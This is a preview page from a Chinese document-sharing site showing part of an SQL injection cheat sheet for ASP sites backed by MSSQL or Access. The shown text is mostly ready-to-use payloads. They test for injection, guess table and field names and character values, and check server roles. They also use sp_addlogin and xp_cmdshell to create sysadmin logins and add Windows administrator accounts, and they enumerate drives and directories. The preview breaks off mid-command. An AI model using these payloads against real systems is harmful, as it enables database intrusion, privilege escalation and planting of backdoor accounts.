网站大量收购独家精品文档,联系QQ:2885784924

SQL入侵全語法手册.doc

  1. 1、本文档共21页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
SQL入侵全語法手册

SQL手工注入大全 ------------------------------------------------------------------ 比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多, 看看下面的 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user0 3.判断数据库系统 ;and (select count(*) from sysobjects)0 mssql ;and (select count(*) from msysobjects)0 access 4.注入参数是字符 and [查询条件] and = 5.搜索时没过滤参数的 and [查询条件] and %25= 6.猜数据库 ;and (select Count(*) from [数据库名])0 7.猜字段 ;and (select Count(字段名) from 数据库名)0 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)0 9.(1)猜字段的ascii值(access) ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0 (2)猜字段的ascii值(mssql) ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0 10.测试权限结构(mssql) ;and 1=(select IS_SRVROLEMEMBER(sysadmin));-- ;and 1=(select IS_SRVROLEMEMBER(serveradmin));-- ;and 1=(select IS_SRVROLEMEMBER(setupadmin));-- ;and 1=(select IS_SRVROLEMEMBER(securityadmin));-- ;and 1=(select IS_SRVROLEMEMBER(diskadmin));-- ;and 1=(select IS_SRVROLEMEMBER(bulkadmin));-- ;and 1=(select IS_MEMBER(db_owner));-- 11.添加mssql和系统的帐户 ;exec master.dbo.sp_addlogin username;-- ;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- ;exec master.dbo.xp_cmdshell net user username password /add;-- ;exec master.dbo.xp_cmdshell net localgroup administrators username /add;-- 12.(1)遍历目录 ;create table dirs(paths varchar(100), id int) ;insert dirs exec master.dbo.xp_dirtree c:\ ;and (select top 1 paths from dirs)0 ;and (select top 1 paths from dirs where paths not in(上步得到的paths))) (2)遍历目录 ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构 ;insert int

文档评论(0)

bmdj + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档